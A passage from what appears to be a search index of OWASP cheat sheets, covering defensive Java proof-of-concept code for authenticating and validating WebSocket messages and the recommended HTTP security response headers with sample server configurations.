the token validation\n     */\npublic static DecodedJWT validateToken(String token) throws Exception {\nAlgorithm algorithm = Algorithm.HMAC256(loadSecret());\nJWTVerifier verifier = JWT.require(algorithm).withIssuer(\"WEBSOCKET-SERVER\").build();\nreturn verifier.verify(token);\n}\n\n/**\n     * Load the JWT secret used to sign token using a byte array for secret storage in order\n     * to avoid persistent string in memory\n     *\n     * @return The secret as byte array\n     * @throws IOException If any error occur during the secret loading\n     */\nprivate static byte[] loadSecret() throws IOException {\nreturn Files.readAllBytes(Paths.get(\"src\", \"main\", \"resources\", \"jwt-secret.txt\"));\n}\n}\n

JSON schema of the input and output authentication message - Define the expected structure of the input and output messages from the authentication endpoint point of view

{\n\"$schema\": \"http://json-schema.org/schema#\",\n\"title\": \"AuthenticationRequest\",\n\"type\": \"object\",\n\"properties\": {\n\"login\": {\n\"type\": \"string\",\n\"pattern\": \"^[a-zA-Z]{1,10}$\"\n},\n\"password\": {\n\"type\": \"string\"\n}\n},\n\"required\": [\n\"login\",\n\"password\"\n]\n}\n\n{\n\"$schema\": \"http://json-schema.org/schema#\",\n\"title\": \"AuthenticationResponse\",\n\"type\": \"object\",\n\"properties\": {\n\"isSuccess;\": {\n\"type\": \"boolean\"\n},\n\"token\": {\n\"type\": \"string\",\n\"pattern\": \"^[a-zA-Z0-9+/=\\\\._-]{0,500}$\"\n},\n\"message\": {\n\"type\": \"string\",\n\"pattern\": \"^[a-zA-Z0-9!\\\\s]{0,100}$\"\n}\n},\n\"required\": [\n\"isSuccess\",\n\"token\",\n\"message\"\n]\n}\n

Authentication message decoder and encoder - Perform the JSON serialization/deserialization and the input/output validation using dedicated JSON Schema. It makes it possible to systematically ensure that all messages received and sent by the endpoint strictly respect the expected structure and content.

import com.fasterxml.jackson.databind.JsonNode;\nimport com.github.fge.jackson.JsonLoader;\nimport com.github.fge.jsonschema.core.exceptions.ProcessingException;\nimport com.github.fge.jsonschema.core.report.ProcessingReport;\nimport com.github.fge.jsonschema.main.JsonSchema;\nimport com.github.fge.jsonschema.main.JsonSchemaFactory;\nimport com.google.gson.Gson;\nimport org.owasp.pocwebsocket.vo.AuthenticationRequest;\n\nimport javax.websocket.DecodeException;\nimport javax.websocket.Decoder;\nimport javax.websocket.EndpointConfig;\nimport java.io.File;\nimport java.io.IOException;\n\n/**\n * Decode JSON text representation to an AuthenticationRequest object\n * <p>\n * As there's one instance of the decoder class by endpoint session so we can use the\n * JsonSchema as decoder instance variable.\n */\npublic class AuthenticationRequestDecoder implements Decoder.Text<AuthenticationRequest> {\n\n/**\n     * JSON validation schema associated to this type of message\n     */\nprivate JsonSchema validationSchema = null;\n\n/**\n     * Initialize decoder and associated JSON validation schema\n     *\n     * @throws IOException If any error occur during the object creation\n     * @throws ProcessingException If any error occur during the schema loading\n     */\npublic AuthenticationRequestDecoder() throws IOException, ProcessingException {\nJsonNode node = JsonLoader.fromFile(\nnew File(\"src/main/resources/authentication-request-schema.json\"));\nthis.validationSchema = JsonSchemaFactory.byDefault().getJsonSchema(node);\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic AuthenticationRequest decode(String s) throws DecodeException {\ntry {\n//Validate the provided representation against the dedicated schema\n//Use validation mode with report in order to enable further inspection/tracing\n//of the error details\n//Moreover the validation method \"validInstance()\" generate a NullPointerException\n//if the representation do not respect the expected schema\n//so it's more proper to use the validation method with report\nProcessingReport validationReport = this.validationSchema.validate(JsonLoader.fromString(s),\ntrue);\n//Ensure there no error\nif (!validationReport.isSuccess()) {\n//Simply reject the message here: Don't care about error details...\nthrow new DecodeException(s, \"Validation of the provided representation failed !\");\n}\n} catch (IOException | ProcessingException e) {\nthrow new DecodeException(s, \"Cannot validate the provided representation to a\"\n+ \" JSON valid representation !\", e);\n}\n\nreturn new Gson().fromJson(s, AuthenticationRequest.class);\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic boolean willDecode(String s) {\nboolean canDecode = false;\n\n//If the provided JSON representation is empty/null then we indicate that\n//representation cannot be decoded to our expected object\nif (s == null || s.trim().isEmpty()) {\nreturn canDecode;\n}\n\n//Try to cast the provided JSON representation to our object to validate at least\n//the structure (content validation is done during decoding)\ntry {\nAuthenticationRequest test = new Gson().fromJson(s, AuthenticationRequest.class);\ncanDecode = (test != null);\n} catch (Exception e) {\n//Ignore explicitly any casting error...\n}\n\nreturn canDecode;\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void init(EndpointConfig config) {\n//Not used\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void destroy() {\n//Not used\n}\n}\n
import com.fasterxml.jackson.databind.JsonNode;\nimport com.github.fge.jackson.JsonLoader;\nimport com.github.fge.jsonschema.core.exceptions.ProcessingException;\nimport com.github.fge.jsonschema.core.report.ProcessingReport;\nimport com.github.fge.jsonschema.main.JsonSchema;\nimport com.github.fge.jsonschema.main.JsonSchemaFactory;\nimport com.google.gson.Gson;\nimport org.owasp.pocwebsocket.vo.AuthenticationResponse;\n\nimport javax.websocket.EncodeException;\nimport javax.websocket.Encoder;\nimport javax.websocket.EndpointConfig;\nimport java.io.File;\nimport java.io.IOException;\n\n/**\n * Encode AuthenticationResponse object to JSON text representation.\n * <p>\n * As there one instance of the encoder class by endpoint session so we can use\n * the JsonSchema as encoder instance variable.\n */\npublic class AuthenticationResponseEncoder implements Encoder.Text<AuthenticationResponse> {\n\n/**\n     * JSON validation schema associated to this type of message\n     */\nprivate JsonSchema validationSchema = null;\n\n/**\n     * Initialize encoder and associated JSON validation schema\n     *\n     * @throws IOException If any error occur during the object creation\n     * @throws ProcessingException If any error occur during the schema loading\n     */\npublic AuthenticationResponseEncoder() throws IOException, ProcessingException {\nJsonNode node = JsonLoader.fromFile(\nnew File(\"src/main/resources/authentication-response-schema.json\"));\nthis.validationSchema = JsonSchemaFactory.byDefault().getJsonSchema(node);\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic String encode(AuthenticationResponse object) throws EncodeException {\n//Generate the JSON representation\nString json = new Gson().toJson(object);\ntry {\n//Validate the generated representation against the dedicated schema\n//Use validation mode with report in order to enable further inspection/tracing\n//of the error details\n//Moreover the validation method \"validInstance()\" generate a NullPointerException\n//if the representation do not respect the expected schema\n//so it's more proper to use the validation method with report\nProcessingReport validationReport = this.validationSchema.validate(JsonLoader.fromString(json),\ntrue);\n//Ensure there no error\nif (!validationReport.isSuccess()) {\n//Simply reject the message here: Don't care about error details...\nthrow new EncodeException(object, \"Validation of the generated representation failed !\");\n}\n} catch (IOException | ProcessingException e) {\nthrow new EncodeException(object, \"Cannot validate the generated representation to a\"+\n\" JSON valid representation !\", e);\n}\n\nreturn json;\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void init(EndpointConfig config) {\n//Not used\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void destroy() {\n//Not used\n}\n\n}\n

Note that the same approach is used in the messages handling part of the POC. All messages exchanged between the client and the server are systematically validated using the same way, using dedicated JSON schemas linked to messages dedicated Encoder/Decoder (serialization/deserialization).

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#authorization-and-access-token-explicit-invalidation","title":"Authorization and access token explicit invalidation","text":"

Authorization information is stored in the access token using the JWT Claim feature (in the POC the name of the claim is access_level). Authorization is validated when a request is received and before any other action using the user input information.

The access token is passed with every message sent to the message endpoint and a block list is used in order to allow the user to request an explicit token invalidation.

Explicit token invalidation is interesting from a user's point of view because, often when tokens are used, the validity timeframe of the token is relatively long (it's common to see a valid timeframe superior to 1 hour) so it's important to allow a user to have a way to indicate to the system \"OK, I have finished my exchange with you, so you can close our exchange session and cleanup associated links\".

It also helps the user to revoke itself of current access if a malicious concurrent access is detected using the same token (case of token stealing).

Token block list - Maintain a temporary list using memory and time limited Caching of hashes of token that are not allowed to be used anymore

import org.apache.commons.jcs.JCS;\nimport org.apache.commons.jcs.access.CacheAccess;\nimport org.apache.commons.jcs.access.exception.CacheException;\n\nimport javax.xml.bind.DatatypeConverter;\nimport java.security.MessageDigest;\nimport java.security.NoSuchAlgorithmException;\n\n/**\n * Utility class to manage the access token that have been declared as no\n * more usable (explicit user logout)\n */\npublic class AccessTokenBlocklistUtils {\n/**\n     * Message content send by user that indicate that the access token that\n     * come along the message must be block-listed for further usage\n     */\npublic static final String MESSAGE_ACCESS_TOKEN_INVALIDATION_FLAG = \"INVALIDATE_TOKEN\";\n\n/**\n     * Use cache to store block-listed token hash in order to avoid memory exhaustion and be consistent\n     * because token are valid 30 minutes so the item live in cache 60 minutes\n     */\nprivate static final CacheAccess<String, String> TOKEN_CACHE;\n\nstatic {\ntry {\nTOKEN_CACHE = JCS.getInstance(\"default\");\n} catch (CacheException e) {\nthrow new RuntimeException(\"Cannot init token cache !\", e);\n}\n}\n\n/**\n     * Add token into the block list\n     *\n     * @param token Token for which the hash must be added\n     * @throws NoSuchAlgorithmException If SHA256 is not available\n     */\npublic static void addToken(String token) throws NoSuchAlgorithmException {\nif (token != null && !token.trim().isEmpty()) {\nString hashHex = computeHash(token);\nif (TOKEN_CACHE.get(hashHex) == null) {\nTOKEN_CACHE.putSafe(hashHex, hashHex);\n}\n}\n}\n\n/**\n     * Check if a token is present in the block list\n     *\n     * @param token Token for which the presence of the hash must be verified\n     * @return TRUE if token is block-listed\n     * @throws NoSuchAlgorithmException If SHA256 is not available\n     */\npublic static boolean isBlocklisted(String token) throws NoSuchAlgorithmException {\nboolean exists = false;\nif (token != null && !token.trim().isEmpty()) {\nString hashHex = computeHash(token);\nexists = (TOKEN_CACHE.get(hashHex) != null);\n}\nreturn exists;\n}\n\n/**\n     * Compute the SHA256 hash of a token\n     *\n     * @param token Token for which the hash must be computed\n     * @return The hash encoded in HEX\n     * @throws NoSuchAlgorithmException If SHA256 is not available\n     */\nprivate static String computeHash(String token) throws NoSuchAlgorithmException {\nString hashHex = null;\nif (token != null && !token.trim().isEmpty()) {\nMessageDigest md = MessageDigest.getInstance(\"SHA-256\");\nbyte[] hash = md.digest(token.getBytes());\nhashHex = DatatypeConverter.printHexBinary(hash);\n}\nreturn hashHex;\n}\n\n}\n

Message handling - Process a request from a user to add a message in the list. Show a authorization validation approach example

import com.auth0.jwt.interfaces.Claim;\nimport com.auth0.jwt.interfaces.DecodedJWT;\nimport org.owasp.pocwebsocket.enumeration.AccessLevel;\nimport org.owasp.pocwebsocket.util.AccessTokenBlocklistUtils;\nimport org.owasp.pocwebsocket.util.AuthenticationUtils;\nimport org.owasp.pocwebsocket.util.MessageUtils;\nimport org.owasp.pocwebsocket.vo.MessageRequest;\nimport org.owasp.pocwebsocket.vo.MessageResponse;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport javax.websocket.EncodeException;\nimport javax.websocket.RemoteEndpoint;\nimport java.io.IOException;\nimport java.util.ArrayList;\nimport java.util.List;\n\n/**\n * Handle message flow\n */\npublic class MessageHandler implements javax.websocket.MessageHandler.Whole<MessageRequest> {\n\nprivate static final Logger LOG = LoggerFactory.getLogger(MessageHandler.class);\n\n/**\n     * Reference to the communication channel with the client\n     */\nprivate RemoteEndpoint.Basic clientConnection;\n\n/**\n     * Constructor\n     *\n     * @param clientConnection Reference to the communication channel with the client\n     */\npublic MessageHandler(RemoteEndpoint.Basic clientConnection) {\nthis.clientConnection = clientConnection;\n}\n\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void onMessage(MessageRequest message) {\nMessageResponse response = null;\ntry {\n/*Step 1: Verify the token*/\nString token = message.getToken();\n//Verify if is it in the block list\nif (AccessTokenBlocklistUtils.isBlocklisted(token)) {\nthrow new IllegalAccessException(\"Token is in the block list !\");\n}\n\n//Verify the signature of the token\nDecodedJWT decodedToken = AuthenticationUtils.validateToken(token);\n\n/*Step 2: Verify the authorization (access level)*/\nClaim accessLevel = decodedToken.getClaim(\"access_level\");\nif (accessLevel == null || AccessLevel.valueOf(accessLevel.asString()) == null) {\nthrow new IllegalAccessException(\"Token have an invalid access level claim !\");\n}\n\n/*Step 3: Do the expected processing*/\n//Init the list of the messages for the current user\nif (!MessageUtils.MESSAGES_DB.containsKey(decodedToken.getSubject())) {\nMessageUtils.MESSAGES_DB.put(decodedToken.getSubject(), new ArrayList<>());\n}\n\n//Add message to the list of message of the user if the message is a not a token invalidation\n//order otherwise add the token to the block list\nif (AccessTokenBlocklistUtils.MESSAGE_ACCESS_TOKEN_INVALIDATION_FLAG\n.equalsIgnoreCase(message.getContent().trim())) {\nAccessTokenBlocklistUtils.addToken(message.getToken());\n} else {\nMessageUtils.MESSAGES_DB.get(decodedToken.getSubject()).add(message.getContent());\n}\n\n//According to the access level of user either return only is message or return all message\nList<String> messages = new ArrayList<>();\nif (accessLevel.asString().equals(AccessLevel.USER.name())) {\nMessageUtils.MESSAGES_DB.get(decodedToken.getSubject())\n.forEach(s -> messages.add(String.format(\"(%s): %s\", decodedToken.getSubject(), s)));\n} else if (accessLevel.asString().equals(AccessLevel.ADMIN.name())) {\nMessageUtils.MESSAGES_DB.forEach((k, v) ->\nv.forEach(s -> messages.add(String.format(\"(%s): %s\", k, s))));\n}\n\n//Build the response object indicating that exchange succeed\nif (AccessTokenBlocklistUtils.MESSAGE_ACCESS_TOKEN_INVALIDATION_FLAG\n.equalsIgnoreCase(message.getContent().trim())) {\nresponse = new MessageResponse(true, messages, \"Token added to the block list\");\n}else{\nresponse = new MessageResponse(true, messages, \"\");\n}\n\n} catch (Exception e) {\nLOG.error(\"[MessageHandler] Error occur in exchange process.\", e);\n//Build the response object indicating that exchange fail\n//We send the error detail on client because ware are in POC (it will not the case in a real app)\nresponse = new MessageResponse(false, new ArrayList<>(), \"Error occur during exchange: \"\n+ e.getMessage());\n} finally {\n//Send response\ntry {\nthis.clientConnection.sendObject(response);\n} catch (IOException | EncodeException e) {\nLOG.error(\"[MessageHandler] Error occur in response object sending.\", e);\n}\n}\n}\n}\n
"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#confidentiality-and-integrity","title":"Confidentiality and Integrity","text":"

If the raw version of the protocol is used (protocol ws://) then the transferred data is exposed to eavesdropping and potential on-the-fly alteration.

Example of capture using Wireshark and searching for password exchanges in the stored PCAP file, not printable characters has been explicitly removed from the command result:

$ grep -aE '(password)' capture.pcap\n{\"login\":\"bob\",\"password\":\"bob123\"}\n

There is a way to check, at WebSocket endpoint level, if the channel is secure by calling the method isSecure() on the session object instance.

Example of implementation in the method of the endpoint in charge of setup of the session and affects the message handler:

/**\n * Handle the beginning of an exchange\n *\n * @param session Exchange session information\n */\n@OnOpen\npublic void start(Session session) {\n...\n//Affect a new message handler instance in order to process the exchange only if the channel is secured\nif(session.isSecure()) {\nsession.addMessageHandler(new AuthenticationMessageHandler(session.getBasicRemote()));\n}else{\nLOG.info(\"[AuthenticationEndpoint] Session {} do not use a secure channel so no message handler \" +\n\"was affected for processing and session was explicitly closed !\", session.getId());\ntry{\nsession.close(new CloseReason(CloseReason.CloseCodes.CANNOT_ACCEPT,\"Insecure channel used !\"));\n}catch(IOException e){\nLOG.error(\"[AuthenticationEndpoint] Session {} cannot be explicitly closed !\", session.getId(),\ne);\n}\n\n}\nLOG.info(\"[AuthenticationEndpoint] Session {} message handler affected for processing\", session.getId());\n}\n

Expose WebSocket endpoints only on wss:// protocol (WebSockets over SSL/TLS) in order to ensure Confidentiality and Integrity of the traffic like using HTTP over SSL/TLS to secure HTTP exchanges.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html","title":"HTTP Security Response Headers Cheat Sheet","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#introduction","title":"Introduction","text":"

HTTP Headers are a great booster for web security with easy implementation. Proper HTTP response headers can help prevent security vulnerabilities like Cross-Site Scripting, Clickjacking, Information disclosure and more.

In this cheat sheet, we will review all security-related HTTP headers, recommended configurations, and reference other sources for complicated headers.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#security-headers","title":"Security Headers","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-frame-options","title":"X-Frame-Options","text":"

The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame>, <iframe>, <embed> or <object>. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.

Content Security Policy (CSP) frame-ancestors directive obsoletes X-Frame-Options for supporting browsers (source).

X-Frame-Options header is only useful when the HTTP response where it is included has something to interact with (e.g. links, buttons). If the HTTP response is a redirect or an API returning JSON data, X-Frame-Options does not provide any security.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation","title":"Recommendation","text":"

Use Content Security Policy (CSP) frame-ancestors directive if possible.

Do not allow displaying of the page in a frame.

X-Frame-Options: DENY

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-xss-protection","title":"X-XSS-Protection","text":"

The HTTP X-XSS-Protection response header is a feature of Internet Explorer, Chrome, and Safari that stops pages from loading when they detect reflected cross-site scripting (XSS) attacks.

WARNING: Even though this header can protect users of older web browsers that don't yet support CSP, in some cases, this header can create XSS vulnerabilities in otherwise safe websites source.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_1","title":"Recommendation","text":"

Use a Content Security Policy (CSP) that disables the use of inline JavaScript.

Do not set this header or explicitly turn it off.

X-XSS-Protection: 0

Please see Mozilla X-XSS-Protection for details.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-content-type-options","title":"X-Content-Type-Options","text":"

The X-Content-Type-Options response HTTP header is used by the server to indicate to the browsers that the MIME types advertised in the Content-Type headers should be followed and not guessed.

This header is used to block browsers' MIME type sniffing, which can transform non-executable MIME types into executable MIME types (MIME Confusion Attacks).

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_2","title":"Recommendation","text":"

Set the Content-Type header correctly throughout the site.

X-Content-Type-Options: nosniff

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#referrer-policy","title":"Referrer-Policy","text":"

The Referrer-Policy HTTP header controls how much referrer information (sent via the Referer header) should be included with requests.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_3","title":"Recommendation","text":"

Referrer policy has been supported by browsers since 2014. Today, the default behavior in modern browsers is to no longer send all referrer information (origin, path, and query string) to the same site but to only send the origin to other sites. However, since not all users may be using the latest browsers we suggest forcing this behavior by sending this header on all requests.

Referrer-Policy: strict-origin-when-cross-origin

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#content-type","title":"Content-Type","text":"

The Content-Type representation header is used to indicate the original media type of the resource (before any content encoding is applied for sending). If not set correctly, the resource (e.g. an image) may be interpreted as HTML, making XSS vulnerabilities possible.

Although it is recommended to always set the Content-Type header correctly, it would constitute a vulnerability only if the content is intended to be rendered by the client and the resource is untrusted (provided or modified by a user).

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_4","title":"Recommendation","text":"

Content-Type: text/html; charset=UTF-8

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#set-cookie","title":"Set-Cookie","text":"

The Set-Cookie HTTP response header is used to send a cookie from the server to the user agent, so the user agent can send it back to the server later. To send multiple cookies, multiple Set-Cookie headers should be sent in the same response.

This is not a security header per se, but its security attributes are crucial.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_5","title":"Recommendation","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#strict-transport-security-hsts","title":"Strict-Transport-Security (HSTS)","text":"

The HTTP Strict-Transport-Security response header (often abbreviated as HSTS) lets a website tell browsers that it should only be accessed using HTTPS, instead of using HTTP.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_6","title":"Recommendation","text":"

Strict-Transport-Security: max-age=63072000; includeSubDomains; preload

Please checkout HTTP Strict Transport Security Cheat Sheet for more information.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#expect-ct","title":"Expect-CT \u274c","text":"

The Expect-CT header lets sites opt-in to reporting of Certificate Transparency (CT) requirements. Given that mainstream clients now require CT qualification, the only remaining value is reporting such occurrences to the nominated report-uri value in the header. The header is now less about enforcement and more about detection/reporting.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_7","title":"Recommendation","text":"

Do not use it. Mozilla recommends avoiding it, and removing it from existing code if possible.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#content-security-policy-csp","title":"Content-Security-Policy (CSP)","text":"

Content Security Policy (CSP) is a security feature that is used to specify the origin of content that is allowed to be loaded on a website or in a web applications. It is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross-Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement to distribution of malware.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_8","title":"Recommendation","text":"

Content Security Policy is complex to configure and maintain. For an explanation on customization options, please read Content Security Policy Cheat Sheet

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#access-control-allow-origin","title":"Access-Control-Allow-Origin","text":"

If you don't use this header, your site is protected by default by the Same Origin Policy (SOP). What this header does is relax this control in specified circumstances.

The Access-Control-Allow-Origin is a CORS (cross-origin resource sharing) header. This header indicates whether the response it is related to can be shared with requesting code from the given origin. In other words, if siteA requests a resource from siteB, siteB should indicate in its Access-Control-Allow-Origin header that siteA is allowed to fetch that resource, if not, the access is blocked due to Same Origin Policy (SOP).

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_9","title":"Recommendation","text":"

If you use it, set specific origins instead of *. Checkout Access-Control-Allow-Origin for details.

Access-Control-Allow-Origin: https://yoursite.com

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#cross-origin-opener-policy-coop","title":"Cross-Origin-Opener-Policy (COOP)","text":"

The HTTP Cross-Origin-Opener-Policy (COOP) response header allows you to ensure a top-level document does not share a browsing context group with cross-origin documents.

This header works together with Cross-Origin-Embedder-Policy (COEP) and Cross-Origin-Resource-Policy (CORP) explained below.

This mechanism protects against attacks like Spectre which can cross the security boundary established by Same Origin Policy (SOP) for resources in the same browsing context group.

As this headers are very related to browsers, it may not make sense to be applied to REST APIs or clients that are not browsers.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_10","title":"Recommendation","text":"

Isolates the browsing context exclusively to same-origin documents.

HTTP Cross-Origin-Opener-Policy: same-origin

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#cross-origin-embedder-policy-coep","title":"Cross-Origin-Embedder-Policy (COEP)","text":"

The HTTP Cross-Origin-Embedder-Policy (COEP) response header prevents a document from loading any cross-origin resources that don't explicitly grant the document permission (using CORP or CORS).

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_11","title":"Recommendation","text":"

A document can only load resources from the same origin, or resources explicitly marked as loadable from another origin.

Cross-Origin-Embedder-Policy: require-corp

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#cross-origin-resource-policy-corp","title":"Cross-Origin-Resource-Policy (CORP)","text":"

The Cross-Origin-Resource-Policy (CORP) header allows you to control the set of origins that are empowered to include a resource. It is a robust defense against attacks like Spectre, as it allows browsers to block a given response before it enters an attacker's process.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_12","title":"Recommendation","text":"

Limit current resource loading to the site and sub-domains only.

Cross-Origin-Resource-Policy: same-site

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#permissions-policy-formerly-feature-policy","title":"Permissions-Policy (formerly Feature-Policy)","text":"

Permissions-Policy allows you to control which origins can use which browser features, both in the top-level page and in embedded frames. For every feature controlled by Feature Policy, the feature is only enabled in the current document or frame if its origin matches the allowed list of origins. This means that you can configure your site to never allow the camera or microphone to be activated. This prevents that an injection, for example an XSS, enables the camera, the microphone, or other browser feature.

More information: Permissions-Policy

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_13","title":"Recommendation","text":"

Set it and disable all the features that your site does not need or allow them only to the authorized domains:

Permissions-Policy: geolocation=(), camera=(), microphone=()

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#floc-federated-learning-of-cohorts","title":"FLoC (Federated Learning of Cohorts)","text":"

FLoC is a method proposed by Google in 2021 to deliver interest-based advertisements to groups of users (\"cohorts\"). The Electronic Frontier Foundation, Mozilla, and others believe FLoC does not do enough to protect users' privacy.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_14","title":"Recommendation","text":"

A site can declare that it does not want to be included in the user's list of sites for cohort calculation by sending this HTTP header.

Permissions-Policy: interest-cohort=()

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#server","title":"Server","text":"

The Server header describes the software used by the origin server that handled the request \u2014 that is, the server that generated the response.

This is not a security header, but how it is used is relevant for security.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_15","title":"Recommendation","text":"

Remove this header or set non-informative values.

Server: webserver

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-powered-by","title":"X-Powered-By","text":"

The X-Powered-By header describes the technologies used by the webserver. This information exposes the server to attackers. Using the information in this header, attackers can find vulnerabilities easier.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_16","title":"Recommendation","text":"

Remove all X-Powered-By headers.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-aspnet-version","title":"X-AspNet-Version","text":"

Provides information about the .NET version.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_17","title":"Recommendation","text":"

Disable sending this header. Add the following line in your web.config in the <system.web> section to remove it.

<httpRuntime enableVersionHeader=\"false\" />\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-aspnetmvc-version","title":"X-AspNetMvc-Version","text":"

Provides information about the .NET version.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_18","title":"Recommendation","text":"

Disable sending this header. To remove the X-AspNetMvc-Version header, add the below line in Global.asax file.

MvcHandler.DisableMvcResponseHeader = true;\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-dns-prefetch-control","title":"X-DNS-Prefetch-Control","text":"

The X-DNS-Prefetch-Control HTTP response header controls DNS prefetching, a feature by which browsers proactively perform domain name resolution on both links that the user may choose to follow as well as URLs for items referenced by the document, including images, CSS, JavaScript, and so forth.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_19","title":"Recommendation","text":"

The default behavior of browsers is to perform DNS caching which is good for most websites. If you do not control links on your website, you might want to set off as a value to disable DNS prefetch to avoid leaking information to those domains.

X-DNS-Prefetch-Control: off

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#public-key-pins-hpkp","title":"Public-Key-Pins (HPKP)","text":"

The HTTP Public-Key-Pins response header is used to associate a specific cryptographic public key with a certain web server to decrease the risk of MITM attacks with forged certificates.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_20","title":"Recommendation","text":"

This header is deprecated and should not be used anymore.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#adding-http-headers-in-different-technologies","title":"Adding HTTP Headers in Different Technologies","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#php","title":"PHP","text":"

The sample code below sets the X-Frame-Options header in PHP.

header(\"X-Frame-Options: DENY\");\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#apache","title":"Apache","text":"

Below is an .htaccess sample configuration which sets the X-Frame-Options header in Apache.

<IfModule mod_headers.c>\nHeader set X-Frame-Options \"DENY\"\n</IfModule>\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#iis","title":"IIS","text":"

Add configurations below to your Web.config in IIS to send the X-Frame-Options header.

<system.webServer>\n...\n <httpProtocol>\n<customHeaders>\n<add name=\"X-Frame-Options\" value=\"DENY\" />\n</customHeaders>\n</httpProtocol>\n...\n</system.webServer>\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#haproxy","title":"HAProxy","text":"

Add the line below to your front-end, listen, or backend configurations to send the X-Frame-Options header.

http-response set-header X-Frame-Options DENY\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#nginx","title":"Nginx","text":"

Below is a sample configuration, it sets the X-Frame-Options header in Nginx.

add_header \"X-Frame-Options\" \"DENY\";\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#express","title":"Express","text":"

You can use helmet to setup HTTP headers in Express. The code below is sample for adding the X-Frame-Options header.

const helmet = require('helmet');\nconst app = express();\n// Sets \"X-Frame-Options: SAMEORIGIN\"\napp.use(\nhelmet.frameguard({\naction: \"sameorigin\",\n})\n);\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#testing-proper-implementation-of-security-headers","title":"Testing Proper Implementation of Security Headers","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#mozilla-observatory","title":"Mozilla Observatory","text":"

The Mozilla Observatory is an online tool which helps you to check your website's header status.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#smartscanner","title":"SmartScanner","text":"

SmartScanner has a dedicated test profile for testing security of HTTP headers. Online tools usually test the homepage of the given address. But SmartScanner scans the whole website. So, you can make sure all of your web pages have the right HTTP Headers in place.

